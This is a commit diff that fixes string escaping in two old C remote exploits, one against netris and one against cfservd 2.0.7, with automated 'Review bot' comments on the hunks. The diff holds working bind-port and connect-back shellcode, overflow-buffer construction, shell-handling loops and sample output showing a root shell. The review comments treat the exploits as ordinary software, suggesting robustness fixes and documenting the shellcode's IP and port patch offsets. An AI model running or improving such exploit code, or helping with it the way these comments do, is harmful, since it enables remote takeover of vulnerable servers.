|
||||
fprintf(stdout," [+] Hostname: %s\n",hostname);
|
||||
|
||||
fprintf(stdout,\" [+] Port num: %d\\n\",port);
|
||||
fprintf(stdout," [+] Port num: %d\n",port);
|
||||
|
||||
fprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr);
|
||||
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
fprintf(stdout,\" [1] #1 Set codes.\\n\");
|
||||
fprintf(stdout," [1] #1 Set codes.\n");
|
||||
|
||||
|
||||
|
||||
if(!(buf=(char *)malloc(BUFSIZE+1)))
|
||||
|
||||
printe(\"getcode(): allocating memory failed.\",1);
|
||||
printe("getcode(): allocating memory failed.",1);
|
||||
|
||||
|
||||
|
||||
memset(buf, 0x90, BUFSIZE);
|
||||
|
||||
buf[0] = \'1\';
|
||||
buf[1] = \'1\';
|
||||
buf[2] = \'1\';
|
||||
buf[3] = \'1\';
|
||||
buf[4] = \'1\';
|
||||
buf[5] = \'1\';
|
||||
buf[6] = \'1\';
|
||||
buf[0] = '1';
|
||||
buf[1] = '1';
|
||||
buf[2] = '1';
|
||||
buf[3] = '1';
|
||||
buf[4] = '1';
|
||||
buf[5] = '1';
|
||||
buf[6] = '1';
|
||||
|
||||
memset(buf+7,0x90,636);
|
||||
|
||||
|
@ -354,17 +354,17 @@ fprintf(stdout,\" [1] #1 Set codes.\\n\");
|
|||
|
||||
memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr));
|
||||
|
||||
fprintf(stdout,\" [1] #1 Set socket.\\n\");
|
||||
fprintf(stdout," [1] #1 Set socket.\n");
|
||||
|
||||
sd=sock_connect(hostname,port);
|
||||
|
||||
fprintf(stdout,\" [1] #1 Send codes.\\n\");
|
||||
fprintf(stdout," [1] #1 Send codes.\n");
|
||||
|
||||
write(sd,buf,BUFSIZE);
|
||||
|
||||
close(sd);
|
||||
sleep(1);
|
||||
fprintf(stdout,\" [1] #3 Get shell.\\n\");
|
||||
fprintf(stdout," [1] #3 Get shell.\n");
|
||||
getshell(hostname,26112);
|
||||
exit(0);
|
||||
|
||||
|
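Review bot: the progress messages run `[1] #1 Set codes.`, `[1] #1 Set socket.`, `[1] #1 Send codes.`, `[1] #3 Get shell.`, so the step numbers are out of sequence; `#1` to `#4` would read correctly. `write(sd,buf,BUFSIZE)` also ignores a short write before `close(sd)`, harmless for a single buffer but worth a check. The `\\n` to `\n` changes are correct.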
@ -386,13 +386,13 @@ unsigned short port){
|
|||
|
||||
s.sin_port=htons(port);
|
||||
|
||||
printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
||||
|
||||
if((s.sin_addr.s_addr=inet_addr(hostname))){
|
||||
|
||||
if(!(t=gethostbyname(hostname)))
|
||||
|
||||
printe(\"couldn\'t resolve hostname.\",1);
|
||||
printe("couldn't resolve hostname.",1);
|
||||
|
||||
memcpy((char*)&s.sin_addr,(char*)t->h_addr,
|
||||
|
||||
|
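Review bot: `if((s.sin_addr.s_addr=inet_addr(hostname))){` in this hunk tests the result of inet_addr() for non-zero, but inet_addr() reports failure with INADDR_NONE (0xffffffff), which is non-zero, so the branch is entered both for a valid dotted-quad and for an unparseable hostname and then falls through to `gethostbyname(hostname)` in either case (only 0.0.0.0 skips it). It works by accident because gethostbyname() also accepts a dotted-quad; comparing against INADDR_NONE explicitly, and only resolving when the literal parse fails, makes the intent match the code.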
@ -406,11 +406,11 @@ unsigned short port){
|
|||
|
||||
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
|
||||
|
||||
printe(\"netris connection failed.\",1);
|
||||
printe("netris connection failed.",1);
|
||||
|
||||
alarm(0);
|
||||
|
||||
printf(\"[*] successfully connected: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] successfully connected: %s:%d.\n",hostname,port);
|
||||
|
||||
return(sock);
|
||||
|
||||
|
@ -428,11 +428,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
struct sockaddr_in sa;
|
||||
|
||||
printf(\"[*] checking to see if the exploit was successful.\\n\");
|
||||
printf("[*] checking to see if the exploit was successful.\n");
|
||||
|
||||
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
|
||||
|
||||
printe(\"getshell(): socket() failed.\",1);
|
||||
printe("getshell(): socket() failed.",1);
|
||||
|
||||
sa.sin_family=AF_INET;
|
||||
|
||||
|
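Review bot: `struct sockaddr_in sa;` in this hunk is used without being zeroed before `sa.sin_family=AF_INET;` and the later memcpy into `sa.sin_addr`, so `sin_zero` carries stack garbage into connect(); add `memset(&sa,0,sizeof(sa));` after the declaration, as the cfservd exploit further down in this commit does with `memset(&sockadd,0,sizeof(sockadd));`.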
@ -440,7 +440,7 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
if(!(he=gethostbyname(hostname)))
|
||||
|
||||
printe(\"getshell(): couldn\'t resolve.\",1);
|
||||
printe("getshell(): couldn't resolve.",1);
|
||||
|
||||
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
|
||||
|
||||
|
@ -454,11 +454,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
alarm(TIMEOUT);
|
||||
|
||||
printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
||||
|
||||
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
|
||||
|
||||
printf(\"[!] connection failed: %s:%d.\\n\",hostname,port);
|
||||
printf("[!] connection failed: %s:%d.\n",hostname,port);
|
||||
|
||||
return;
|
||||
|
||||
|
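Review bot: on the failure path of this hunk, `printf("[!] connection failed: %s:%d.\n",hostname,port);` is followed by a bare `return;`, so the `alarm(TIMEOUT);` armed at the top of the hunk is never cancelled and `sock` is never closed; cancel the timer and close the descriptor before returning, as the success path does with `alarm(0);`.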
@ -466,11 +466,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
alarm(0);
|
||||
|
||||
printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);
|
||||
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
|
||||
|
||||
signal(SIGINT,SIG_IGN);
|
||||
|
||||
write(sock,\"uname -a;id\\n\",13);
|
||||
write(sock,"uname -a;id\n",13);
|
||||
|
||||
while(1){
|
||||
|
||||
|
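Review bot: `write(sock,"uname -a;id\n",13);` sends 13 bytes, but the literal is 12 characters long, so the string's terminating NUL is written to the remote shell as well; use `strlen()` or `sizeof(...)-1` rather than a hand-counted length. `signal(SIGINT,SIG_IGN);` just above it also means Ctrl-C can no longer end the session locally, which is worth a comment since the read loop below has no other quit path besides EOF on stdin.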
@ -482,17 +482,17 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
if(select(sock+1,&fds,0,0,0)<1)
|
||||
|
||||
printe(\"getshell(): select() failed.\",1);
|
||||
printe("getshell(): select() failed.",1);
|
||||
|
||||
if(FD_ISSET(0,&fds)){
|
||||
|
||||
if((r=read(0,buf,4096))<1)
|
||||
|
||||
printe(\"getshell(): read() failed.\",1);
|
||||
printe("getshell(): read() failed.",1);
|
||||
|
||||
if(write(sock,buf,r)!=r)
|
||||
|
||||
printe(\"getshell(): write() failed.\",1);
|
||||
printe("getshell(): write() failed.",1);
|
||||
|
||||
}
|
||||
|
||||
|
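Review bot: `if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1);` treats EOF on stdin (`read()` returning 0) as an error and exits through the failure banner; a closed stdin is the normal way to end the interactive session, so only `r<0` should be reported as a failure, with `r==0` closing the socket and returning. The same applies to `if(write(sock,buf,r)!=r)`, where a short write is not necessarily an error.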
@ -516,9 +516,9 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
void printe(char *err,short e){
|
||||
|
||||
fprintf(stdout,\" [-] Failed.\\n\\n\");
|
||||
fprintf(stdout," [-] Failed.\n\n");
|
||||
|
||||
fprintf(stdout,\" Happy Exploit ! :-)\\n\\n\");
|
||||
fprintf(stdout," Happy Exploit ! :-)\n\n");
|
||||
|
||||
|
||||
|
||||
|
|
|
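Review bot: in the lines shown of `void printe(char *err,short e){`, the `err` argument is never printed; the function emits only `" [-] Failed.\n\n"` and the sign-off `" Happy Exploit ! :-)\n\n"`, so the specific messages passed from sock_connect() and getshell() (`"couldn't resolve hostname."`, `"getshell(): socket() failed."`) never reach the user. Print `err` to stderr before the banner, and consider perror() where errno is meaningful.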
@ -10,11 +10,11 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
* Date: 4 November 2003 *
|
||||
* *
|
||||
* Yet another version.. no big deal.. nothing special.. *
|
||||
* just an extra built-in support for \'connect-back\' shell.. *
|
||||
* so that I dun need \'nc -l -p 31337\' stuffs... duh !?! *
|
||||
* just an extra built-in support for 'connect-back' shell.. *
|
||||
* so that I dun need 'nc -l -p 31337' stuffs... duh !?! *
|
||||
* *
|
||||
* Anyway.. credit should go to Nick Cleaton who disovered *
|
||||
* this nice little \'bug\'... ;) *
|
||||
* this nice little 'bug'... ;) *
|
||||
* *
|
||||
* As usual, use it at your very own risk... *
|
||||
* But then again, I really doubt this code will work for you *
|
||||
|
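Review bot: this hunk only touches a block comment, where the old `\'connect-back\'` escaping was cosmetic rather than a compile error, so the change is safe but not sufficient on its own; the string literals in the later hunks of the same file are where the unescaping matters. The unchanged credit line has a typo, `disovered` for `discovered`, that could be fixed in the same pass.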
@ -48,11 +48,11 @@ Transaction Receive [88888][]
|
|||
RecvSocketStream(8888)
|
||||
(Concatenated 4192 from stream)
|
||||
Transmission empty...
|
||||
Received: [\'\\x90\'......1???QQQ?f????PPfha,fS?SRQ???1??
|
||||
Received: ['\x90'......1???QQQ?f????PPfha,fS?SRQ???1??
|
||||
1??1?R?f?????0?1??PW?f?????9?@1 ?1????1???
|
||||
1???1?h//shh/bin?PS??1??1 ?? on socket -1869574000
|
||||
Transaction Send[t 20][Packed text]
|
||||
cfservd: Couldn\'t send
|
||||
cfservd: Couldn't send
|
||||
cfservd: send
|
||||
cfservd: Closing connection
|
||||
|
||||
|
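Review bot: the unescape of `Received: [\'\\x90\'......` to `Received: ['\x90'......` is correct for this block, which is captured cfservd debug output rather than C, so `\x90` should stay as the literal text the daemon printed. The log excerpt is doing real work as evidence: `on socket -1869574000` followed by `cfservd: Couldn't send` shows the overflowed buffer has already overwritten the server's socket variable before it tries to reply, but nothing in the file says so; a one-line comment above the excerpt would make the sample worth more than the raw dump.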
@ -68,7 +68,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
|
|||
Tested to work against cfservd 2.0.7 on Redhat 8.0
|
||||
|
||||
-> Using return address of 0x4029eeff
|
||||
-> \'Connecting\' mode...
|
||||
-> 'Connecting' mode...
|
||||
-> Exploit string sent. Waiting for a shell...
|
||||
-> Connecting to shell at 192.168.1.1:24876
|
||||
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
|
||||
|
@ -89,7 +89,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
|
|||
Tested to work against cfservd 2.0.7 on Redhat 8.0
|
||||
|
||||
-> Using return address of 0x4029eeff
|
||||
-> \'Listening\' mode...( port: 24876 )
|
||||
-> 'Listening' mode...( port: 24876 )
|
||||
-> Exploit string sent....
|
||||
-> Waiting for connection....
|
||||
-> Connection from: 192.168.1.1
|
||||
|
@ -132,61 +132,61 @@ exit
|
|||
#define SC_SIZE_1 sizeof(bindport)
|
||||
#define SC_SIZE_2 sizeof(connback)
|
||||
|
||||
#define CMD \"/usr/bin/id\\n\"
|
||||
#define CMD "/usr/bin/id\n"
|
||||
|
||||
/*
|
||||
* Shellcode were shamelessly ripped from netric\'s code... =p
|
||||
* Shellcode were shamelessly ripped from netric's code... =p
|
||||
*/
|
||||
|
||||
char bindport[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
|
||||
\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
|
||||
\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"
|
||||
\"\\x50\\x66\\x68\\x61\\x2c\\xb3\\x02\\x66\"
|
||||
\"\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"
|
||||
\"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\"
|
||||
\"\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"
|
||||
\"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\"
|
||||
\"\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"
|
||||
\"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\"
|
||||
\"\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\"
|
||||
\"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\"
|
||||
\"\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"
|
||||
\"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\"
|
||||
\"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\"
|
||||
\"\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"
|
||||
\"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";
|
||||
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
|
||||
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
|
||||
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
|
||||
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
|
||||
"\x50\x66\x68\x61\x2c\xb3\x02\x66"
|
||||
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
|
||||
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
|
||||
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
|
||||
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
|
||||
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
|
||||
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
|
||||
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
|
||||
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
|
||||
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
|
||||
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
|
||||
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
|
||||
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
|
||||
"\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
|
||||
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
|
||||
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
|
||||
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
|
||||
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
|
||||
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
|
||||
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
|
||||
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
|
||||
|
||||
char connback[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
|
||||
\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
|
||||
\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"
|
||||
\"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\"
|
||||
\"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"
|
||||
\"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"
|
||||
\"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"
|
||||
\"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"
|
||||
\"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"
|
||||
\"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"
|
||||
\"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"
|
||||
\"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"
|
||||
\"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"
|
||||
\"\\x01\\xcd\\x80\";
|
||||
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
|
||||
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
|
||||
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
|
||||
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
|
||||
"\x68\x41\x42\x43\x44\x66\x68\xb0"
|
||||
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
|
||||
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
|
||||
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
|
||||
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
||||
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
|
||||
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
|
||||
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
|
||||
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
|
||||
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
|
||||
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
|
||||
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
|
||||
"\x01\xcd\x80";
|
||||
|
||||
/*
|
||||
* Ugly select() stuffs....
|
||||
* Modified (a little) from TESO\'s code..
|
||||
* Modified (a little) from TESO's code..
|
||||
* to support connect back shell.... ;)
|
||||
*/
|
||||
|
||||
|
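Review bot: this is the hunk where the storage escaping actually mattered for correctness: on the removed side the shellcode was stored as `\"\\x31\\xc0...\"`, with doubled backslashes, which in C would yield the four characters `\x31` rather than the byte 0x31, so the exploit could not have worked from the old file even if the `\"` quoting had compiled. Now that the bytes are right, two things deserve comments: `connback[]` contains the placeholder `\x68\x41\x42\x43\x44` (`push` of the ASCII "ABCD" that `changeip()` patches) and the port word after `\x66\x68` that `changeport(char *code, int port, int offset)` rewrites, and `bindport[]` carries its port in `\x66\x68\x61\x2c` (bytes 0x61 0x2c, i.e. 24876, matching `Connecting to shell at 192.168.1.1:24876` in the sample run). Recording those offsets next to the arrays would spare the next reader from disassembling the blobs to find them.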
@ -206,7 +206,7 @@ void doshell(int sock) {
|
|||
if (FD_ISSET (0, &rfds)) {
|
||||
l = read (0, buf, sizeof (buf));
|
||||
if (l <= 0) {
|
||||
fprintf(stdout,\"-> Connection closed by local user\\n\");
|
||||
fprintf(stdout,"-> Connection closed by local user\n");
|
||||
exit (EXIT_FAILURE);
|
||||
}
|
||||
sent=0;
|
||||
|
@ -222,10 +222,10 @@ void doshell(int sock) {
|
|||
if (FD_ISSET (sock, &rfds)) {
|
||||
l = read (sock, buf, sizeof (buf));
|
||||
if (l == 0) {
|
||||
fprintf(stdout,\"-> Connection closed by remote host.\\n\");
|
||||
fprintf(stdout,"-> Connection closed by remote host.\n");
|
||||
exit (EXIT_FAILURE);
|
||||
} else if (l < 0) {
|
||||
fprintf(stdout,\"-> read() error\\n\");
|
||||
fprintf(stdout,"-> read() error\n");
|
||||
exit (EXIT_FAILURE);
|
||||
}
|
||||
write (1, buf, l);
|
||||
|
@ -255,38 +255,38 @@ void changeport(char *code, int port, int offset) {
|
|||
|
||||
void sendcmd(int sock) {
|
||||
if (send(sock,CMD,strlen(CMD),0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
}
|
||||
|
||||
void usage(char *s) {
|
||||
fprintf(stdout,\"\\nUsage: %s [-options]\\n\\n\",s);
|
||||
fprintf(stdout,\"\\t-r\\tSize of \'return addresses\'\\n\");
|
||||
fprintf(stdout,\"\\t-b\\tThe overall size of the buffer\\n\");
|
||||
fprintf(stdout,\"\\t-a\\tAlignment size [0~3]\\n\");
|
||||
fprintf(stdout,\"\\t-t\\tTarget\'s port\\n\");
|
||||
fprintf(stdout,\"\\t-s\\tPort to bind shell to (in \'connecting\' mode), or\\n\");
|
||||
fprintf(stdout,\"\\t\\tPort for shell to connect back (in \'listening\' mode)\\n\");
|
||||
fprintf(stdout,\"\\t-o\\tOffset from the default return address\\n\");
|
||||
fprintf(stdout,\"\\t-h\\tTarget\'s IP\\n\");
|
||||
fprintf(stdout,\"\\t-l\\tListening for shell connecting\\n\");
|
||||
fprintf(stdout,\"\\t\\tback to port specified by \'-s\' switch\\n\");
|
||||
fprintf(stdout,\"\\t-i\\tIP for shell to connect back\\n\");
|
||||
fprintf(stdout,\"\\t-T\\tNumber of seconds to wait for connection\\n\\n\");
|
||||
fprintf(stdout,\"\\tNotes:\\n\\t======\\n\\t\'-h\' is mandatory\\n\");
|
||||
fprintf(stdout,\"\\t\'-i\' is mandatory if \'-l\' is specified\\n\\n\");
|
||||
fprintf(stdout,"\nUsage: %s [-options]\n\n",s);
|
||||
fprintf(stdout,"\t-r\tSize of 'return addresses'\n");
|
||||
fprintf(stdout,"\t-b\tThe overall size of the buffer\n");
|
||||
fprintf(stdout,"\t-a\tAlignment size [0~3]\n");
|
||||
fprintf(stdout,"\t-t\tTarget's port\n");
|
||||
fprintf(stdout,"\t-s\tPort to bind shell to (in 'connecting' mode), or\n");
|
||||
fprintf(stdout,"\t\tPort for shell to connect back (in 'listening' mode)\n");
|
||||
fprintf(stdout,"\t-o\tOffset from the default return address\n");
|
||||
fprintf(stdout,"\t-h\tTarget's IP\n");
|
||||
fprintf(stdout,"\t-l\tListening for shell connecting\n");
|
||||
fprintf(stdout,"\t\tback to port specified by '-s' switch\n");
|
||||
fprintf(stdout,"\t-i\tIP for shell to connect back\n");
|
||||
fprintf(stdout,"\t-T\tNumber of seconds to wait for connection\n\n");
|
||||
fprintf(stdout,"\tNotes:\n\t======\n\t'-h' is mandatory\n");
|
||||
fprintf(stdout,"\t'-i' is mandatory if '-l' is specified\n\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void sigalrm() {
|
||||
fprintf(stdout,\"-> Nope.. I ain\'t waiting any longer.. =p\\n\");
|
||||
fprintf(stdout,"-> Nope.. I ain't waiting any longer.. =p\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
|
||||
char opt;
|
||||
char *buf, *ptr, *ip=\"\";
|
||||
char *buf, *ptr, *ip="";
|
||||
struct sockaddr_in sockadd;
|
||||
int i, s1, s2, i_len, ok=0, mode=0;
|
||||
int time_out=TIME_OUT, scsize=SC_SIZE_1;
|
||||
|
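Review bot: `void sigalrm() {` in this hunk is installed as a signal handler but is declared with an empty parameter list rather than `void sigalrm(int sig)`, the type `signal()` expects. In the declarations at the end of the hunk, `char opt;` is the variable the getopt loop below compares with `!=EOF`; getopt() returns `int`, and on targets where `char` is unsigned the comparison with EOF (-1) can never be true, so it should be `int opt;`.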
@ -296,48 +296,48 @@ int main(int argc, char *argv[]) {
|
|||
|
||||
if (argc<2) { usage(argv[0]); }
|
||||
|
||||
while ((opt=getopt(argc,argv,\"i:r:b:a:h:t:s:o:T:l\"))!=EOF) {
|
||||
while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) {
|
||||
switch(opt) {
|
||||
case \'i\':
|
||||
case 'i':
|
||||
ip=optarg;
|
||||
changeip(ip);
|
||||
break;
|
||||
|
||||
case \'l\':
|
||||
case 'l':
|
||||
mode=1;
|
||||
scsize=SC_SIZE_2;
|
||||
break;
|
||||
|
||||
case \'T\':
|
||||
case 'T':
|
||||
time_out=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'b\':
|
||||
case 'b':
|
||||
buffsize=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'a\':
|
||||
case 'a':
|
||||
align=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'h\':
|
||||
case 'h':
|
||||
ok=1;
|
||||
sockadd.sin_addr.s_addr = inet_addr(optarg);
|
||||
break;
|
||||
|
||||
case \'r\':
|
||||
case 'r':
|
||||
retsize=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'t\':
|
||||
case 't':
|
||||
t_port=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'s\':
|
||||
case 's':
|
||||
s_port=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset=atoi(optarg);
|
||||
break;
|
||||
|
||||
|
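Review bot: `case 'h':` in this hunk sets `ok=1;` and `sockadd.sin_addr.s_addr = inet_addr(optarg);` without checking for INADDR_NONE, so a mistyped target address is accepted and the later connect() is aimed at 255.255.255.255; check the return value and fall through to usage() on failure. The numeric options (`t_port=atoi(optarg);`, `s_port=atoi(optarg);`, `buffsize=atoi(optarg);`, `align=atoi(optarg);`) use atoi() with no range check even though usage() documents `-a` as `[0~3]`; `strtol()` with a bounds test would make bad input fail early instead of producing a malformed buffer.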
@ -347,16 +347,16 @@ int main(int argc, char *argv[]) {
|
|||
}
|
||||
}
|
||||
|
||||
if (!ok || (mode&&((strcmp(ip,\"\")==0)) ) ) { usage(argv[0]); }
|
||||
if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }
|
||||
|
||||
if (!(buf=malloc(buffsize+1))) {
|
||||
err_exit(\"-> malloc() error\");
|
||||
err_exit("-> malloc() error");
|
||||
}
|
||||
|
||||
ret_addr=RET_ADDR-offset;
|
||||
fprintf(stdout,\"\\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\\n\");
|
||||
fprintf(stdout,\"Tested to work against cfservd 2.0.7 on Redhat 8.0\\n\\n\");
|
||||
fprintf(stdout,\"-> Using return address of 0x%08x\\n\", ret_addr);
|
||||
fprintf(stdout,"\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\n");
|
||||
fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n");
|
||||
fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr);
|
||||
|
||||
ptr=buf;
|
||||
for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }
|
||||
|
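Review bot: `for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }` at the end of this hunk starts filling the buffer obtained from `malloc(buffsize+1)` without ever comparing `HDR_SIZE+align` (or the return-address and shellcode regions that follow) against `buffsize`, which is user-controlled through `-b`; a too-small `-b` therefore overruns a heap buffer in the exploit itself. Validate `buffsize >= HDR_SIZE+align+retsize+scsize` right after `ret_addr=RET_ADDR-offset;` before building the string.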
@ -379,23 +379,23 @@ int main(int argc, char *argv[]) {
|
|||
sockadd.sin_port = htons(t_port);
|
||||
|
||||
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket error\");
|
||||
err_exit("-> socket error");
|
||||
}
|
||||
|
||||
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
|
||||
err_exit(\"-> connect() error\");
|
||||
err_exit("-> connect() error");
|
||||
}
|
||||
|
||||
if (mode) {
|
||||
|
||||
fprintf(stdout,\"-> \'Listening\' mode...( port: %d )\\n\",s_port);
|
||||
fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port);
|
||||
|
||||
if (fork()==0) {
|
||||
sleep(2);
|
||||
if (send(s1,buf,buffsize,0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
fprintf(stdout,\"-> Exploit string sent....\\n\");
|
||||
fprintf(stdout,"-> Exploit string sent....\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
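Review bot: `if (fork()==0) {` in the listening branch of this hunk treats a fork() failure (return -1) the same as the parent path, so on failure the payload is never sent and the parent goes on to block in accept() waiting for a shell that was never spawned; test for -1 and call `err_exit()`. The child also returns `exit(0);` after `fprintf(stdout,"-> Exploit string sent....\n");` while a failed `send()` goes through `err_exit()`, so the parent's later `wait();` can only tell the two apart if it inspects the exit status, which it does not.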
@ -405,7 +405,7 @@ int main(int argc, char *argv[]) {
|
|||
alarm(time_out);
|
||||
|
||||
if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket error\");
|
||||
err_exit("-> socket error");
|
||||
}
|
||||
|
||||
memset(&sockadd,0,sizeof(sockadd));
|
||||
|
@ -415,26 +415,26 @@ int main(int argc, char *argv[]) {
|
|||
i_len=sizeof(sockadd);
|
||||
|
||||
if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) {
|
||||
err_exit(\"-> bind() error\");
|
||||
err_exit("-> bind() error");
|
||||
